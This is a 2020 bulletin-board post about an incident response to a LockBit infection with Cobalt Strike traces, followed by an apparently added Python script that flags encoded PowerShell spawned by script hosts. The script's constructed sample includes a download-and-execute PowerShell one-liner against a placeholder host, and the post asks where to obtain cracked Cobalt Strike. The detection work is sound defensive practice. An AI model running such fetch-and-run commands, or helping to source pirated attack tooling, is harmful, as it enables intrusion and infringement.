Subj : Cobalt Strike
To : All
From : gh0st
Date : Mon Jun 08 2020 00:33:34

I've been working on a client's network and they were hit with a new variant of lockbit (*.lock2bits) recently. I ran some scans with the Thor IoC scanner (nextron-systems.com) and it found traces of Cobalt Strike beacon as well as a bunch of other IoCs. It said it found evidence of Putter Panda tools, but it seems unlikely that it would have been that group.

Anyhow, back to the subject: Cobalt Strike. It's pretty scary. As are a lot of the PowerShell post-exploitation frameworks like Empire, PowerSploit and PwnedShell. I'm still working on the best way to defend against this. I have a feeling the threat actors still have persistence. Likely through a Cobalt Strike beacon that they keep on moving laterally throughout the network to avoid detection, as when I scanned the machine that showed the beacon a second time, it was gone. I'm certain they're watching us work.

The payload was triggered from malicious PowerShell that was invoked via mshtml, which invoked cscript and then BASE64-encoded commands. I ended up tracing them to a Google Docs spreadsheet and found another instruction hidden in what looked like a blank cell. This pointed to another site that got a few malicious hits on VirusTotal and Hybrid-Analysis. We blocked that. But I still have a feeling they're in the network. My guess is a VPN over DNS, but damned if I can detect it.

I'm kind of rambling. This has been a crazy cleanup effort. And it's not finished.

So Cobalt Strike. It's like $3500 for a license for a year. I haven't even searched online yet, but is Cobalt Strike floating around online in a cracked form? I'd love to be able to run it through its paces in my homelab to see if it will help me defend against it. I haven't seen a lot online regarding defense against Cobalt Strike specifically.

Though I'm assuming it would be crippled, at least in part, by enabling Constrained Language Mode across the domain, which will gut the .NET and system calls that a lot of malicious PowerShell requires. Anyways, hopefully someone out there can let me know where I can find Cobalt Strike or give me any info!

Cheers!
gh0st

--- Mystic BBS v1.12 A45 2020/02/18 (Linux/64)
 * Origin: The Bottomless Abyss BBS * bbs.bottomlessabyss.net (700:100/33)
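The post describes a chain of script host -> cscript -> PowerShell with Base64-encoded commands, which is exactly the kind of process-creation telemetry a defender can triage before worrying about the Cobalt Strike beacon itself. The script below is an added example, not code from the post or from any of the tools it names. It assumes process-creation events with parent, image and command-line fields (as Sysmon Event ID 1 or Security 4688 provide), assumes mshta.exe/cscript.exe/wscript.exe as the script hosts of interest, and uses constructed sample events rather than data from the incident. It decodes -EncodedCommand blobs (UTF-16LE under Base64, which is why a plain Base64 decoder shows garbage) and scores each event; note that an encoded command on its own is not treated as malicious, since legitimate scheduled tasks use it too.

```python
"""Triage process-creation events for encoded PowerShell launched from a
script host. Added example; the events below are constructed, not taken
from the incident in the post."""
import base64
import ntpath
import re

# Abbreviations powershell.exe accepts for -EncodedCommand, then a base64 blob.
ENCODED_FLAG = re.compile(r"(?i)(?<!\S)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})")

# Script hosts that should rarely be the parent of powershell.exe (assumption).
SCRIPT_HOSTS = {"mshta.exe", "cscript.exe", "wscript.exe"}

# Tokens common in staged downloader one-liners.
SUSPICIOUS_TOKENS = ("iex", "invoke-expression", "downloadstring",
                     "net.webclient", "frombase64string", "hidden", "bypass")


def encode_ps(command: str) -> str:
    """Encode a command the way -EncodedCommand expects it (UTF-16LE, then base64)."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(blob: str):
    """Return the decoded command, or None if the blob is not UTF-16LE base64."""
    try:
        raw = base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True)
        return raw.decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(event: dict) -> dict:
    """Score one event with fields parent, image, cmdline; threshold is 3."""
    score, reasons, decoded = 0, [], None
    parent = ntpath.basename(event["parent"]).lower()
    image = ntpath.basename(event["image"]).lower()
    cmdline = event["cmdline"]

    if image in ("powershell.exe", "pwsh.exe") and parent in SCRIPT_HOSTS:
        score += 2
        reasons.append(f"powershell spawned by script host {parent}")

    m = ENCODED_FLAG.search(cmdline)
    if m:
        score += 1
        reasons.append("encoded command present")
        decoded = decode_encoded_command(m.group(1))
        # Strip the blob before token matching: base64 text can contain
        # substrings like 'iex' by chance.
        cmdline = cmdline[:m.start(1)] + cmdline[m.end(1):]
        if decoded is None:
            score += 1
            reasons.append("encoded blob does not decode as UTF-16LE")

    haystack = (cmdline + " " + (decoded or "")).lower()
    for token in SUSPICIOUS_TOKENS:
        if token in haystack:
            score += 1
            reasons.append(f"token {token!r}")

    return {"score": score, "suspicious": score >= 3,
            "reasons": reasons, "decoded": decoded}


# Constructed sample events (paths and commands are made up for illustration).
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\System32\cscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoP -NonI -W Hidden -enc " + encode_ps(
         "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')")},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Process"},
    # Encoded but benign: a cleanup task run by the service host.
    {"parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -EncodedCommand " + encode_ps(
         r"Get-ChildItem C:\Logs -Recurse | Remove-Item -Force")},
]


def run_samples() -> list:
    """Triage every sample event and return the results in order."""
    return [triage(e) for e in SAMPLE_EVENTS]


if __name__ == "__main__":
    for event, result in zip(SAMPLE_EVENTS, run_samples()):
        print(f"score={result['score']} suspicious={result['suspicious']}")
        for reason in result["reasons"]:
            print("   ", reason)
        if result["decoded"]:
            print("    decoded:", result["decoded"])
```

Feed it your own 4688/Sysmon command lines and the decoded text is what you pivot on: the URL or the second-stage host is what to block and hunt for across the estate. The script-host parent is the strongest signal here; the encoded flag alone only raises the score by one, so the benign scheduled-task sample stays below the threshold.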